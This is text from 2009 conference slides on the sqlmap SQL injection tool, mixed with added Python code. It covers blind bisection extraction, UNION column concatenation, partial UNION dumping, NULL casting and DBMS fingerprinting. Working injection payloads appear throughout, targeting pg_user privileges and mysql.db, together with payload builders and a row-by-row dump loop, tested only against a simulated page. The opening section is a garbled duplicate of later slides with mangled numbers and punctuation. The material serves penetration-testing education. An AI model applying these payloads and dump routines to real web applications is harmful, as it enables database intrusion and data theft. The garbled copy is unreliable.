In the inferential blind SQL injection algorithm will be
id=1))) AND ORD(MID((SQL query) Nth SQL query output character 1)) gt Bisection algorithm number AND (((RaNd LIKE RaNd
In the UNION query SQL injection technique will be
id=1))) UNION ALL SELECT NULL Concatenated SQL query NULL AND (((RaNd LIKE RaNd
SQL payload (33)
Intercon III London ndash January 9 2009 21
First demo
I did every demo possible to see if the things would do what they were promising they would do
Doug Hall
Intercon III London ndash January 9 2009 22
You have got an injection point
It is vulnerable to UNION query SQL injection
sqlmap detected it for you by NULL bruteforcing or by ORDER BY clause bruteforcing depending on your options
Bypass columns limitation (14)
Intercon III London ndash January 9 2009 23
Obstacle
The number of columns in the web application SELECT statement is lower than the number of columns of your UNION ALL SELECT statement
Bypass columns limitation (24)
Intercon III London ndash January 9 2009 24
A possible solution consists in concatenating your SELECT statement columns in a single output by using the specific DBMS string concatenation operator or function
Example on PostgreSQL 83 to retrieve users privileges
The SQL query to inject is
SELECT usename usecreatedb usesuper usecatupd FROM pg_user
Bypass columns limitation (34)
Intercon III London ndash January 9 2009 25
The injection will be
UNION ALL SELECT NULL CHR(83)||CHR(114)||CHR(108)||CHR(71)||CHR(86)||CHR(116)||COALESCE(CAST(usename AS CHARACTER(10000)) CHR(32))||CHR(104)||CHR(100)||CHR(122)||CHR(81)||CHR(121)||CHR(90)||COALESCE(CAST(usecreatedb AS CHARACTER(10000)) CHR(32))||CHR(104)||CHR(100)||CHR(122)||CHR(81)||CHR(121)||CHR(90)||COALESCE(CAST(usesuper AS CHARACTER(10000)) CHR(32))||CHR(104)||CHR(100)||CHR(122)||CHR(81)||CHR(121)||CHR(90)||COALESCE(CAST(usecatupd AS CHARACTER(10000)) CHR(32))||CHR(75)||CHR(121)||CHR(80)||CHR(65)||CHR(68)||CHR(102) NULL FROM pg_usershyshy
Bypass columns limitation (44)
Intercon III London ndash January 9 2009 26
Obstacle
You have got an injection point vulnerable to UNION query SQL injection Only the query outputs first entry or a range of entries is displayed in the page content
Going partial UNION (13)
Intercon III London ndash January 9 2009 27
sqlmap automatizes a known technique
Changes the parameter value to its negative value causing the original query to produce no output
Inspects and unpack the provided SQL statement
Calculates its output number of entries
Limits it after the UNION ALL SELECT to return one entry at a time
Repeat the previous action N times where N is equal to the number of entries
Going partial UNION (23)
Intercon III London ndash January 9 2009 28
Example on MySQL 41 to enumerate list of databases
The SQL query to inject is
SELECT db FROM mysqldb
sqlmap identified the injection point as being an non-quoted parameter (integer) in the WHERE clause with the equal operator (simple scenario)
The injection will be
id=shy1 UNION ALL SELECT NULL CONCAT(CHAR(1008471698798)IFNULL(CAST(db AS CHAR(10000)) CHAR(32)) CHAR(65831188187116)) NULL FROM mysqldb LIMIT 0 1 AND 6972=6972
Going partial UNION (33)
Intercon III London ndash January 9 2009 29
Back-end DBMS fingerprinting is a mandatory step to go through to take full advantage of a SQL injection flaw
There are a few well known techniques and a few over-looked techniques
sqlmap implements up to four techniques three of these are in use by other tools
The user can force the back-end DBMS software value no HTTP requests are sent to identify the software
By default a basic DBMS fingerprint based on one or two techniques is done only two HTTP requests are sent
The user can choose to perform an extensive DBMS fingerprint based on four techniques numerous (30+) HTTP requests are sent
DBMS fingerprint (14)
Intercon III London ndash January 9 2009 30
The techniques implemented to perform an extensive back-end DBMS fingerprint are
Inband error messages
Banner parsing
SQL dialect
Specific functions static output comparison
On a default installation all of them are reliable
On a hardened installation the last two are reliable
DBMS fingerprint (24)
Intercon III London ndash January 9 2009 31
Example of basic back-end DBMS fingerprint on PostgreSQL 83
The techniques in use are two
The two SQL queries injected to identify it are
AND integerint=integer
SQL dialect
AND COALESCE(integer NULL)=integer
Specific function static output comparison
DBMS fingerprint (34)
Intercon III London ndash January 9 2009 32
Example of extensive back-end DBMS fingerprint on Microsoft SQL Server 2005
The techniques in use are three
The result is
active fingerprint Microsoft SQL Server 2005banner parsing fingerprint Microsoft SQL Server 2005 Service Pack 0 version 9001399html error message fingerprint Microsoft SQL Server
Active fingerprint refers to SQL dialect and specific functions static output comparison
DBMS fingerprint (44)
Intercon III London ndash January 9 2009 33
Fingerprinting is a key step in penetration testing
It is not only about back-end DBMS software
There are techniques and tools to fingerprint the web server the web application technology and their underlying system
What about the back-end DBMS underlying system
sqlmap can fingerprint them without making extra requests
Webapplication server and web application technology by parsing the HTTP response headers (Server X-AspNet-Version X-Powered-By etc) ndash known technique
Back-end DBMS operating system by parsing the DBMS banner ndash over-looked technique
More on fingerprint
Intercon III London ndash January 9 2009 34
Second demo
A demo as in demolish or demonstrationCyclops X-Men Evolution
Intercon III London ndash January 9 2009 35
It might comes in handy sometimes to be able to run your own SQL queries mainly for file system read and write access and operating system command execution
The tool inspects the provided statement
If it is a SELECT statement sqlmap uses depending on users options the inferential blind or the UNION query technique to retrieve its output
If it is a data manipulation statement a transaction statement or any other valid SQL statement it uses stacked queries to run it if the web application supports them
Give me a SQL shell
Intercon III London ndash January 9 2009 36
Automation vs granularity (12)sqlmap has been developed to make it simple for a busy penetration tester to detect and exploit SQL injection vulnerabilities in web applications
Providing it with a source of targets it can automatically
Detect all possible SQL injections and confirm them
Identify the SQL query syntax
Fingerprint the back-end DBMS
The user does not have to look on the Net for DBMS specific queries then manually inject them to enumerate users password hashes check if the session user is a DBA enumerate table columns datatype etc
There is an option to dump the whole back-end DBMS
Intercon III London ndash January 9 2009 37
Automation vs granularity (22) The tester is a professional he knows what he does and why
There are options to specify
How to compare True and False HTTP responses
A single or more testable parameters
The SQL payload prefix and postfix
A single or a range of entries to dump from a table
A single or multiple columns to dump from a table
Custom SQL statements to run
Options can be specified from both command line andor configuration file
Options are documented in the users manual with examples
Dealing with advertisements (1/3)
In the real world web applications are often complex.
Usually the page content changes at each refresh.
They have inline counters, advertisement banners, clocks, etc.
The inferential blind SQL injection algorithm is based on the concept that the HTTP response differs depending on whether the injected SQL condition evaluates to True or to False.
Dealing with advertisements (2/3)
Obstacle:
If the page content does not depend only on the SQL statement and changes at each refresh, then the True/False comparison may not work.
Intercon III London ndash January 9 2009 13
Python library helped to solve this problem for each HTTP response sqlmap calls a function that compares the returned page content with the untouched original page content
Return a measure of the page contents similarity as a float in the range [0 1] with a radio of 3
It works also when the original page is stable but the injected query with a valid condition (True) differs
If the automatic comparison fails the user can provide a string or a regular expression to match on both original and True page contents and to not match on False page contents
Dealing with advertisements (33)
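The comparison just described, as an added example that is not sqlmap's own code: a difflib-based similarity check with a True band, a False band and an undecided band in between, plus the string/regex override for when the automatic comparison is not reliable. The thresholds, the page template, the advert strings and the user record are constructed for the example; sqlmap's actual values differ.

```python
import difflib
import re

# Similarity thresholds; chosen for this illustration, not taken from sqlmap.
TRUE_THRESHOLD = 0.98
FALSE_THRESHOLD = 0.96


def similarity(original, page):
    """difflib ratio between two page bodies, rounded to three digits.

    autojunk is disabled: on bodies longer than 200 characters difflib would
    otherwise treat every frequent character as junk and report a much lower ratio.
    """
    return round(difflib.SequenceMatcher(None, original, page, autojunk=False).ratio(), 3)


def compare(original, page, match_string=None, match_regex=None):
    """Classify `page` as a True or a False response relative to `original`.

    A user-supplied string or regular expression takes precedence over the
    automatic comparison.  Returns None when the ratio falls between the two
    thresholds and nothing settles it, i.e. the comparison is unreliable.
    """
    if match_string is not None:
        return match_string in page
    if match_regex is not None:
        return re.search(match_regex, page) is not None
    ratio = similarity(original, page)
    if ratio >= TRUE_THRESHOLD:
        return True
    if ratio <= FALSE_THRESHOLD:
        return False
    return None


# Constructed page template: a rotating advert and a visitor counter change at
# every refresh; the rest of the page depends only on the query result.
FILLER = ("<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit, sed do "
          "eiusmod tempor incididunt ut labore et dolore magna aliqua.</p>\n") * 20


def render(advert, counter, user):
    if user is None:
        result = "<p>No user found</p>"
    else:
        result = "<table>%s</table>" % "".join(
            "<tr><th>%s</th><td>%s</td></tr>" % item for item in user.items())
    return ("<html><body><div class='ad'>%s</div><p>Visitors today: %d</p>%s%s</body></html>"
            % (advert, counter, result, FILLER))


ADMIN = {  # constructed record
    "id": 1, "name": "admin", "email": "admin@example.com", "role": "administrator",
    "created": "2008-11-03", "address": "1 Example Street, London",
    "bio": "Built-in administrative account with access to every module of the application.",
}

ORIGINAL = render("Advert #17: buy widgets", 1201, ADMIN)     # id=1
TRUE_PAGE = render("Advert #42: cheap flights", 1202, ADMIN)  # id=1 AND 1=1: same row, new advert
FALSE_PAGE = render("Advert #08: learn SQL", 1203, None)       # id=1 AND 1=2: no row at all

if __name__ == "__main__":
    print("True page ratio :", similarity(ORIGINAL, TRUE_PAGE), "->", compare(ORIGINAL, TRUE_PAGE))
    print("False page ratio:", similarity(ORIGINAL, FALSE_PAGE), "->", compare(ORIGINAL, FALSE_PAGE))
    print("Regex override  :", compare(ORIGINAL, FALSE_PAGE, match_regex=r"<th>email</th><td>[^<]+</td>"))
```

The volatile advert and counter cost only a few characters of difference, so the True page still scores above 0.98, while the missing result table drops the False page well below 0.96. When a page is so dynamic that both land in the undecided band, the regex override is the reliable way out: anchor it on the part of the page that only the query result produces.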
To NULL or not to NULL (1/4)
In standard SQL, NULL is allowed as a value for a table column field.
In the inferential blind SQL injection technique a bisection algorithm is usually used to identify whether the ordinal value of the Nth character of the query output is higher than a certain ASCII code; the answer makes the page content True or False.
The SQL statement used by sqlmap, depending on the back-end DBMS, is similar to:
ASCII(SUBSTR((SQL query), Nth SQL query output char, 1)) > Bisection algorithm number
To NULL or not to NULL (2/4)
Obstacle:
On some DBMSs the substring function cannot be used on NULL, and where it is accepted SUBSTR(NULL, ...) yields NULL, so the injected comparison is never True and the bisection cannot distinguish a NULL field from anything else.
Intercon III London ndash January 9 2009 16
A possible solution for this problem consists in modifying all SQL querys columns explicitly
Casting its output to be a string
Returning value (space) if the casted value is still NULL
Example on MySQL 50 The SQL query to enumerate the column name first entry is
SELECT name FROM testusers LIMIT 0 1
Casted SQL query
SELECT IFNULL(CAST(name AS CHAR(10000)) CHAR(32)) FROM testusers LIMIT 0 1
To NULL or not to NULL (34)
To NULL or not to NULL (4/4)
The inferential blind SQL injected statement will then be:
ORD(MID((SELECT IFNULL(CAST(name AS CHAR(10000)), CHAR(32)) FROM test.users LIMIT 0, 1), Nth SQL query output character, 1)) > Bisection algorithm number
URL encoded, for the first output character and the bisection number 63:
ORD%28MID%28%28SELECT%20IFNULL%28CAST%28name%20AS%20CHAR%2810000%29%29%2C%20CHAR%2832%29%29%20FROM%20test.users%20LIMIT%200%2C%201%29%2C%201%2C%201%29%29%20%3E%2063
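The bisection and the NULL problem of the last four slides, as an added example written for this page (not sqlmap's implementation): an oracle that answers the injected ORD(MID(...)) > n condition the way MySQL would, with and without the IFNULL/CAST wrapper, and the bisection that recovers the output character by character. It assumes MySQL's semantics that MID() past the end of a string yields '' and ORD('') is 0, which is what terminates the string; the simulated table values are constructed.

```python
def sql_ord_mid(value, pos, cast_null):
    """Model of ORD(MID(x, pos, 1)) as MySQL evaluates it.

    Without the wrapper, MID(NULL, ...) is NULL and ORD(NULL) is NULL.  With
    IFNULL(CAST(x AS CHAR(10000)), CHAR(32)) a NULL becomes a single space and
    any non-string value is cast to its textual form first.
    """
    if value is None:
        if not cast_null:
            return None
        value = " "
    value = str(value)
    if pos > len(value):
        return 0            # MID() past the end yields '' and ORD('') is 0
    return ord(value[pos - 1])


def build_payload(query, pos, n):
    """The injected condition from the slides, for character `pos` and bisection value `n`."""
    return "ORD(MID((%s), %d, 1)) > %d" % (query, pos, n)


class Oracle:
    """Stand-in for the vulnerable page: answers True/False for one injected
    condition and counts how many HTTP requests that costs."""

    def __init__(self, value, cast_null):
        self.value, self.cast_null, self.requests = value, cast_null, 0

    def __call__(self, pos, n):
        self.requests += 1
        code = sql_ord_mid(self.value, pos, self.cast_null)
        # NULL > n is NULL, and a NULL WHERE condition is treated as False.
        return code is not None and code > n


def bisect_char(oracle, pos, low=0, high=127):
    """Recover the code of the character at 1-based `pos` with 'ORD(...) > n' questions.
    Invariant: low <= code <= high; the interval halves on every request, so seven
    requests suffice for the 7-bit ASCII range."""
    while low < high:
        mid = (low + high) // 2
        if oracle(pos, mid):
            low = mid + 1
        else:
            high = mid
    return low


def bisect_string(oracle, max_len=64):
    """Recover the whole output, one character per bisection, until ORD('') == 0 is seen."""
    chars = []
    for pos in range(1, max_len + 1):
        code = bisect_char(oracle, pos)
        if code == 0:
            break
        chars.append(chr(code))
    return "".join(chars)


def recover(value, cast_null, max_len=64):
    """Run the bisection against one simulated field; returns (recovered string, requests)."""
    oracle = Oracle(value, cast_null)
    return bisect_string(oracle, max_len), oracle.requests


if __name__ == "__main__":
    query = "SELECT IFNULL(CAST(name AS CHAR(10000)), CHAR(32)) FROM test.users LIMIT 0, 1"
    print(build_payload(query, 1, 63))
    for value, cast in (("admin", True), (None, False), (None, True)):
        print(repr(value), "cast" if cast else "no cast", "->", recover(value, cast))
```

Without the wrapper a NULL field answers False to every question, so the bisection reads code 0 at the first position and returns an empty string, indistinguishable from a field that is really empty. With the wrapper the same field comes back as a single space, which is what sqlmap's casted query is for. The request count is also visible: 7 requests per character plus 7 for the terminator, so 'admin' costs 42 round trips.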
SQL payload (1/3)
You have got an injection point.
The injection point is in a SQL statement as follows:
SELECT * FROM users WHERE id LIKE ((('$_GET[id]'))) LIMIT 0, 1
SQL payload (2/3)
Obstacle:
The injection is after a LIKE clause, within three parentheses, and the statement terminates with a LIMIT clause.
SQL payload (3/3)
In this example the SQL payload that sqlmap identifies is:
id=1'))) AND ((('RaNd' LIKE 'RaNd
In the inferential blind SQL injection algorithm it will be:
id=1'))) AND ORD(MID((SQL query), Nth SQL query output character, 1)) > Bisection algorithm number AND ((('RaNd' LIKE 'RaNd
In the UNION query SQL injection technique it will be:
id=1'))) UNION ALL SELECT NULL, Concatenated SQL query, NULL AND ((('RaNd' LIKE 'RaNd
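How the prefix and postfix of the three slides above fit around the injected condition, as an added example that is not sqlmap's code: the payload builders reproduce the slide's strings, and balanced() renders the final statement as the DBMS receives it and checks that quotes and parentheses still close, which is exactly what goes wrong when a prefix or postfix is off by one parenthesis. The statement template is the slide's; 'RaNd' is kept as the slide's placeholder for the random string sqlmap generates.

```python
TEMPLATE = "SELECT * FROM users WHERE id LIKE ((('%s'))) LIMIT 0, 1"  # the statement from the slide

# Payload prefix and postfix for this injection point: the prefix closes the string and
# the three parentheses, the postfix re-opens them so that the original tail
# "'))) LIMIT 0, 1" still parses.
PREFIX = "1')))"
POSTFIX = " AND ((('RaNd' LIKE 'RaNd"


def detection_payload():
    """The payload sqlmap identifies for the injection point."""
    return PREFIX + POSTFIX


def blind_payload(query, pos, n):
    """Inferential blind condition wrapped in prefix and postfix."""
    return "%s AND ORD(MID((%s), %d, 1)) > %d%s" % (PREFIX, query, pos, n, POSTFIX)


def union_payload(concatenated_query, columns=3, position=2):
    """UNION query payload: the concatenated query in one column, NULL in the others."""
    cells = ["NULL"] * columns
    cells[position - 1] = concatenated_query
    return "%s UNION ALL SELECT %s%s" % (PREFIX, ", ".join(cells), POSTFIX)


def render(value):
    """What the DBMS receives once the application interpolates the parameter."""
    return TEMPLATE % value


def balanced(sql):
    """Check that single quotes and parentheses balance, ignoring parentheses inside
    string literals.  A payload that leaves either unbalanced is a syntax error and
    answers False whatever the injected condition was.  Doubled quotes ('') inside
    literals are not handled; the slide's payloads never need them."""
    depth, in_string = 0, False
    for ch in sql:
        if ch == "'":
            in_string = not in_string
        elif not in_string:
            if ch == "(":
                depth += 1
            elif ch == ")":
                depth -= 1
                if depth < 0:
                    return False
    return depth == 0 and not in_string


if __name__ == "__main__":
    for value in ("1", detection_payload(), blind_payload("SELECT name FROM test.users LIMIT 0, 1", 1, 63),
                  union_payload("CONCAT(name, CHAR(32))"), "1'))) AND 1=1"):
        print(balanced(render(value)), render(value))
```

The last case in the usage loop is the one a tester hits when the postfix is forgotten: the trailing `'))) LIMIT 0, 1` of the original statement is swallowed by an unterminated string, so the request errors out and every answer looks False.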
First demo
"I did every demo possible to see if the things would do what they were promising they would do."
Doug Hall
Bypass columns limitation (1/4)
You have got an injection point.
It is vulnerable to UNION query SQL injection.
sqlmap detected it for you, by NULL bruteforcing or by ORDER BY clause bruteforcing depending on your options.
Bypass columns limitation (2/4)
Obstacle:
The number of columns in the web application's SELECT statement is lower than the number of columns of the SELECT statement you want to inject after UNION ALL.
Bypass columns limitation (3/4)
A possible solution consists in concatenating your SELECT statement's columns into a single output by using the DBMS-specific string concatenation operator or function.
Example on PostgreSQL 8.3 to retrieve the users' privileges.
The SQL query to inject is:
SELECT usename, usecreatedb, usesuper, usecatupd FROM pg_user
Bypass columns limitation (4/4)
The injection will be:
UNION ALL SELECT NULL, CHR(83)||CHR(114)||CHR(108)||CHR(71)||CHR(86)||CHR(116)||COALESCE(CAST(usename AS CHARACTER(10000)), CHR(32))||CHR(104)||CHR(100)||CHR(122)||CHR(81)||CHR(121)||CHR(90)||COALESCE(CAST(usecreatedb AS CHARACTER(10000)), CHR(32))||CHR(104)||CHR(100)||CHR(122)||CHR(81)||CHR(121)||CHR(90)||COALESCE(CAST(usesuper AS CHARACTER(10000)), CHR(32))||CHR(104)||CHR(100)||CHR(122)||CHR(81)||CHR(121)||CHR(90)||COALESCE(CAST(usecatupd AS CHARACTER(10000)), CHR(32))||CHR(75)||CHR(121)||CHR(80)||CHR(65)||CHR(68)||CHR(102), NULL FROM pg_user--
The CHR() chains are delimiters written without quote characters: 'SrlGVt' marks the start of the entry, 'hdzQyZ' separates the columns and 'KyPADf' marks its end, so the concatenated value can be split back into its four columns when parsing the page.
Going partial UNION (1/3)
Obstacle:
You have got an injection point vulnerable to UNION query SQL injection, but only the query output's first entry (or a range of entries) is displayed in the page content.
Going partial UNION (2/3)
sqlmap automates a known technique:
- Changes the parameter value to its negative, causing the original query to produce no output
- Inspects and unpacks the provided SQL statement
- Calculates the number of entries of its output
- Limits it after the UNION ALL SELECT to return one entry at a time
- Repeats the previous action N times, where N is equal to the number of entries
Going partial UNION (3/3)
Example on MySQL 4.1 to enumerate the list of databases.
The SQL query to inject is:
SELECT db FROM mysql.db
sqlmap identified the injection point as a non-quoted parameter (integer) in the WHERE clause with the equal operator (simple scenario).
The injection will be:
id=-1 UNION ALL SELECT NULL, CONCAT(CHAR(100,84,71,69,87,98), IFNULL(CAST(db AS CHAR(10000)), CHAR(32)), CHAR(65,83,118,81,87,116)), NULL FROM mysql.db LIMIT 0, 1 AND 6972=6972
Here CHAR(100,84,71,69,87,98) and CHAR(65,83,118,81,87,116) are the start and end delimiters ('dTGEWb' and 'ASvQWt'); LIMIT 0, 1 selects the first entry and is incremented at each iteration.
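One worked implementation of the two techniques above, "Bypass columns limitation" (packing several columns into one delimited string, with the NULL-safe cast) and "Going partial UNION" (count the entries, then LIMIT one at a time and parse the delimited value out of every page). It is an added example written for this page, not sqlmap's code; it generalises the slides to both MySQL and PostgreSQL and includes a constructed stand-in for the vulnerable page so it runs offline. The DBMS executes nothing here: the fake page reads COUNT(*) or the LIMIT offset from the payload and renders the entry the real page would display. Table contents and delimiter strings are constructed (the PostgreSQL delimiters are the ones decoded from the slide).

```python
import random
import re
import string


def sql_string(text, dbms):
    """A literal without quote characters, as in the slides: CHAR(n,n,...) on MySQL,
    CHR(n)||CHR(n)||... on PostgreSQL."""
    codes = [ord(c) for c in text]
    if dbms == "MySQL":
        return "CHAR(%s)" % ",".join(str(c) for c in codes)
    if dbms == "PostgreSQL":
        return "||".join("CHR(%d)" % c for c in codes)
    raise ValueError("unsupported DBMS: %s" % dbms)


def null_safe(expr, dbms):
    """Cast to a string and replace NULL with a space; otherwise one NULL column would
    make the whole concatenation NULL."""
    if dbms == "MySQL":
        return "IFNULL(CAST(%s AS CHAR(10000)), CHAR(32))" % expr
    return "COALESCE(CAST(%s AS CHARACTER(10000)), CHR(32))" % expr


def concatenate(exprs, dbms, start, sep, stop):
    """Pack several columns into one: start + col1 + sep + col2 + ... + stop."""
    parts = [sql_string(start, dbms)]
    for i, expr in enumerate(exprs):
        if i:
            parts.append(sql_string(sep, dbms))
        parts.append(null_safe(expr, dbms))
    parts.append(sql_string(stop, dbms))
    if dbms == "MySQL":
        return "CONCAT(%s)" % ",".join(parts)
    return "||".join(parts)


def union_payload(expr, table, dbms, offset=None):
    """Simple scenario from the slides: numeric parameter, three-column SELECT, our value
    in the second column.  The negative id empties the original result set, so the one
    entry the page displays is ours; LIMIT picks which one."""
    payload = "-1 UNION ALL SELECT NULL, %s, NULL FROM %s" % (expr, table)
    if offset is not None:
        payload += (" LIMIT %d, 1" % offset) if dbms == "MySQL" else (" LIMIT 1 OFFSET %d" % offset)
    return payload


def parse_output(page, start, sep, stop):
    """Recover every delimited entry from the page body and split it back into columns."""
    rows, i = [], 0
    while True:
        a = page.find(start, i)
        if a < 0:
            break
        a += len(start)
        b = page.find(stop, a)
        if b < 0:
            break
        rows.append(page[a:b].split(sep))
        i = b + len(stop)
    return rows


def random_delimiter(length=6):
    return "".join(random.choice(string.ascii_letters) for _ in range(length))


def partial_union_dump(columns, table, dbms, fetch, delimiters=None):
    """The 'going partial UNION' loop: learn the number of entries, then fetch them one
    at a time.  `fetch(payload)` returns the page body for an injected parameter value."""
    start, sep, stop = delimiters or (random_delimiter(), random_delimiter(), random_delimiter())
    count_page = fetch(union_payload(concatenate(["COUNT(*)"], dbms, start, sep, stop), table, dbms))
    count = int(parse_output(count_page, start, sep, stop)[0][0])
    row_expr = concatenate(columns, dbms, start, sep, stop)
    rows = []
    for offset in range(count):
        rows.extend(parse_output(fetch(union_payload(row_expr, table, dbms, offset)), start, sep, stop))
    return rows


def make_fake_app(rows, dbms, start, sep, stop):
    """Constructed stand-in for the vulnerable page (no SQL is run): it reads COUNT(*) or
    the LIMIT offset out of the payload and renders the single entry the real page would
    show, applying the IFNULL/COALESCE rule to None."""
    def fetch(payload):
        if "COUNT(*)" in payload:
            cells = [str(len(rows))]
        else:
            pattern = r"LIMIT (\d+), 1" if dbms == "MySQL" else r"OFFSET (\d+)"
            cells = [" " if v is None else str(v) for v in rows[int(re.search(pattern, payload).group(1))]]
        return "<html><body><h1>%s%s%s</h1><p>banner %d</p></body></html>" % (
            start, sep.join(cells), stop, random.randint(1, 99))
    return fetch
```

Usage: `partial_union_dump(["usename", "usecreatedb", "usesuper", "usecatupd"], "pg_user", "PostgreSQL", fetch)` with `fetch = make_fake_app(rows, "PostgreSQL", start, sep, stop)` returns the table one row per request, a None in the source coming back as a single space exactly as the casted query produces it. The delimiters must be random and reasonably long: a short or predictable marker can collide with page content and shift every parsed column.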
DBMS fingerprint (1/4)
Back-end DBMS fingerprinting is a mandatory step to go through to take full advantage of a SQL injection flaw.
There are a few well known techniques and a few over-looked techniques.
sqlmap implements up to four techniques; three of these are in use by other tools.
The user can force the back-end DBMS software value: no HTTP requests are sent to identify the software.
By default a basic DBMS fingerprint based on one or two techniques is done: only two HTTP requests are sent.
The user can choose to perform an extensive DBMS fingerprint based on four techniques: numerous (30+) HTTP requests are sent.
DBMS fingerprint (2/4)
The techniques implemented to perform an extensive back-end DBMS fingerprint are:
- Inband error messages
- Banner parsing
- SQL dialect
- Specific functions' static output comparison
On a default installation all of them are reliable.
On a hardened installation only the last two are reliable: they depend neither on verbose error messages reaching the client nor on the banner being retrievable.
DBMS fingerprint (3/4)
Example of basic back-end DBMS fingerprint on PostgreSQL 8.3.
The techniques in use are two.
The two SQL queries injected to identify it are (integer being a random number, the same on both sides of the comparison):
AND integer::int=integer
SQL dialect: the :: cast operator is PostgreSQL-specific, so the condition is True only there.
AND COALESCE(integer, NULL)=integer
Specific function static output comparison.
DBMS fingerprint (4/4)
Example of extensive back-end DBMS fingerprint on Microsoft SQL Server 2005.
The techniques in use are three.
The result is:
active fingerprint: Microsoft SQL Server 2005
banner parsing fingerprint: Microsoft SQL Server 2005 Service Pack 0 version 9.00.1399
html error message fingerprint: Microsoft SQL Server
Active fingerprint refers to SQL dialect and specific functions' static output comparison.
More on fingerprint
Fingerprinting is a key step in penetration testing.
It is not only about the back-end DBMS software.
There are techniques and tools to fingerprint the web server, the web application technology and their underlying system.
What about the back-end DBMS underlying system?
sqlmap can fingerprint them without making extra requests:
- Web application server and web application technology, by parsing the HTTP response headers (Server, X-AspNet-Version, X-Powered-By, etc.): known technique
- Back-end DBMS operating system, by parsing the DBMS banner: over-looked technique
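Banner parsing as described on the last two slides, as an added example written for this page (not sqlmap's fingerprint code): it takes the string a DBMS returns for @@version or version() and extracts the product, version, service pack and the operating system the server runs on. The sample banners are constructed in the format these products use; the SQL Server build-to-service-pack table is partial (2005 RTM through SP3) and the Windows NT version table covers only the releases named in it. MySQL's @@version carries no OS information, so the parser returns None for it rather than guessing.

```python
import re

# Constructed sample banners, in the format returned by @@version (SQL Server) and version() (PostgreSQL).
SAMPLE_BANNERS = {
    "mssql": ("Microsoft SQL Server 2005 - 9.00.1399.06 (Intel X86) \n\tOct 14 2005 00:33:37 \n\t"
              "Copyright (c) 1988-2005 Microsoft Corporation\n\t"
              "Express Edition on Windows NT 5.1 (Build 2600: Service Pack 2)\n"),
    "postgres_linux": "PostgreSQL 8.3.5 on i486-pc-linux-gnu, compiled by GCC gcc-4.3.real (Debian 4.3.2-1) 4.3.2",
    "postgres_windows": "PostgreSQL 8.3.5, compiled by Visual C++ build 1400",
    "mysql": "5.0.51a-3ubuntu5.4-log",
}

# Build number to service pack, SQL Server 2005 only (partial table).
MSSQL_2005_BUILDS = {"9.00.1399": 0, "9.00.2047": 1, "9.00.3042": 2, "9.00.4035": 3}
WINDOWS_NT = {"5.0": "Windows 2000", "5.1": "Windows XP", "5.2": "Windows Server 2003",
              "6.0": "Windows Vista / Server 2008"}


def parse_banner(banner):
    """DBMS, version, service pack and host OS from a version banner; None if unrecognised."""
    m = re.match(r"Microsoft SQL Server (\d{4}) - (\d+\.\d+\.\d+)", banner)
    if m:
        year, build = m.groups()
        info = {"dbms": "Microsoft SQL Server " + year, "version": build,
                "service_pack": MSSQL_2005_BUILDS.get(build) if year == "2005" else None, "os": None}
        # The banner tail names the host: "... on Windows NT 5.1 (Build 2600: Service Pack 2)"
        o = re.search(r"Windows NT (\d+\.\d+) \(Build (\d+):\s*(?:Service Pack (\d+))?\s*\)", banner)
        if o:
            nt, build_no, sp = o.groups()
            info["os"] = {"name": WINDOWS_NT.get(nt, "Windows NT " + nt), "build": build_no,
                          "service_pack": int(sp) if sp else 0}
        return info
    m = re.match(r"PostgreSQL (\d+(?:\.\d+)*)(?: on ([^,\s]+))?, compiled by (.+)", banner)
    if m:
        version, triple, compiler = m.groups()
        info = {"dbms": "PostgreSQL", "version": version, "service_pack": None, "os": None}
        if triple:
            # Target triple such as i486-pc-linux-gnu: architecture first, kernel/OS third.
            parts = triple.split("-")
            info["os"] = {"arch": parts[0], "name": parts[2].capitalize() if len(parts) > 2 else triple}
            hint = re.search(r"\(([^)]+)\)", compiler)  # e.g. "(Debian 4.3.2-1)" names the distribution
            if hint:
                info["os"]["distribution"] = hint.group(1)
        elif "Visual C++" in compiler:
            info["os"] = {"arch": None, "name": "Windows"}
        return info
    return None


if __name__ == "__main__":
    for name, banner in SAMPLE_BANNERS.items():
        print(name, "->", parse_banner(banner))
```

The service pack is not printed anywhere in the SQL Server banner: it has to be looked up from the build number, which is why the slide's "Service Pack 0" comes with "version 9.00.1399". The PostgreSQL banner gives the OS and even the distribution for free, but only on Unix builds; on Windows the compiler name is the only hint.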
Second demo
"A demo? As in demolish or demonstration?"
Cyclops, X-Men: Evolution
Give me a SQL shell
It might come in handy sometimes to be able to run your own SQL queries, mainly for file system read and write access and operating system command execution.
The tool inspects the provided statement:
- If it is a SELECT statement, sqlmap uses, depending on the user's options, the inferential blind or the UNION query technique to retrieve its output.
- If it is a data manipulation statement, a transaction statement or any other valid SQL statement, it uses stacked queries to run it, provided the web application (its database API and the DBMS) supports them.
Automation vs granularity (1/2)
sqlmap has been developed to make it simple for a busy penetration tester to detect and exploit SQL injection vulnerabilities in web applications.
Providing it with a source of targets, it can automatically:
- Detect all possible SQL injections and confirm them
- Identify the SQL query syntax
- Fingerprint the back-end DBMS
The user does not have to look on the Net for DBMS-specific queries and then manually inject them to enumerate users' password hashes, check if the session user is a DBA, enumerate table columns' data types, etc.
There is an option to dump the whole back-end DBMS.
Automation vs granularity (2/2)
The tester is a professional: he knows what he does and why.
There are options to specify:
- How to compare True and False HTTP responses
- One or more testable parameters
- The SQL payload prefix and postfix
- A single entry or a range of entries to dump from a table
- A single column or multiple columns to dump from a table
- Custom SQL statements to run
Options can be specified from the command line and/or a configuration file.
Options are documented in the user's manual with examples.
Third demo
"I get tons of uninteresting mail, and system announcements about babies born, etc. At least a demo MIGHT have been interesting."
Richard Stallman
Limitations
Can sqlmap fail to detect or to exploit a SQL injection vulnerability?
Yes, in some cases, mainly because it does not support:
- SQL injection in SQL clauses other than WHERE
- Time-based blind SQL injection technique
...but I am working on these and others.
Want to contribute?
I am always looking forward to code contributions.
Try it, find bugs, send feature requests, review the code and the documentation, contribute on the mailing lists.
I can provide you with:
- Details on code internals
- Write access to the Subversion repository
- Access to the development platform
- A beer if you are in the London area
Links and contacts
Homepage: http://sqlmap.sourceforge.net
Documentation:
http://sqlmap.sourceforge.net/dev/index.html
http://sqlmap.sourceforge.net/doc/README.pdf
Mailing lists:
https://lists.sourceforge.net/lists/listinfo/sqlmap-users
https://lists.sourceforge.net/lists/listinfo/sqlmap-devel
Personal contacts:
E-mail / Jabber: bernardo.damele@gmail.com
Blog: http://bernardodamele.blogspot.com
References
- OWASP Testing Guide, Open Web Application Security Project
- Exploit of a Mom, xkcd
- Deep Blind SQL Injection, Ferruh Mavituna (Portcullis Computer Security Ltd)
